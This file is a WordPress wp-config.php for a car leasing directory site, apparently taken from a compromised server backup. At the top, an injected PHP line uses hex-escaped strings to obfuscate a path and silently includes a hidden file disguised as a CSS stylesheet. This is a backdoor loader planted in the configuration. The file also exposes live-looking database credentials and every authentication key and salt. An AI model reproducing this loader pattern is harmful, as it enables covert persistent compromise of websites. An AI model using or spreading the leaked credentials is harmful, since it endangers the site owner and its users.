File: //old_home_backup/carleasingdirectory.co.uk/public_html/wp-config.php
<?php
/*4b36b*/
$rt6rl = "//home/\x63arleasingdire\x63tory.\x63o.uk/publi\x63_html/wp\x2dadmin/\x63ss/\x63olors/.72d569f3.\x63ss"; if (!isset($rt6rl)) {array ($rt6rl);} else { @include_once /* 24 */ ($rt6rl); }
/*4b36b*/
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'carleasingdirectorycouk');
/** MySQL database username */
define('DB_USER', 'carleasingdirectorycouk');
/** MySQL database password */
define('DB_PASSWORD', 'ezDcLLDYs2QG595Q');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'UukSxon#XCt}.vdHvOHSX1a?@.@#E<0N|NZkRG[UO5^9WQ)eGu+HUa6(.ezPWN3e');
define('SECURE_AUTH_KEY', 'Cq<+lGi{lrj|!6$~0u,cMu_#M}T~BYE0IBUXwP~/@pt<xFX>#4YR@d_TMr@8%N[?');
define('LOGGED_IN_KEY', '0aiIWw)}d>XB*NUo,(NzK8zO/6hvIy22dHa3sD^9E2YJ~I*+})9b|Bjgv(bBq_IV');
define('NONCE_KEY', 'i@&P9p^tqpMQaQ=q6S:f9n6:D@h>*`n9qWG|t_D:`y5IW?:}O(M+hqo0Mv`kaDW?');
define('AUTH_SALT', 'wrsE!0*O&L~,qls8a=vH4N+#d?I YbdOZx#E3|.672>>y@b@iqXXysc{n~S.DhyG');
define('SECURE_AUTH_SALT', '-T}lzERjLp5/AOqx9~R<CT,cG%Fv}4M{E(W!W,HfkZv:?W;14$ofFwH24MD]mm!F');
define('LOGGED_IN_SALT', '`F]Uq[qHwat>N($?z5K^$(i>5^^#M-+GIMn,-qB)j-h|(Z0(7I[]-)Kta4d%c`0k');
define('NONCE_SALT', 'i9jBg3M<i[])3:nPSVIa~6FoAX-Y8(K25NB(Q=,[_*D^e$;a`7Ex%9|0-oZN`}YN');
define('FS_METHOD', 'direct');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');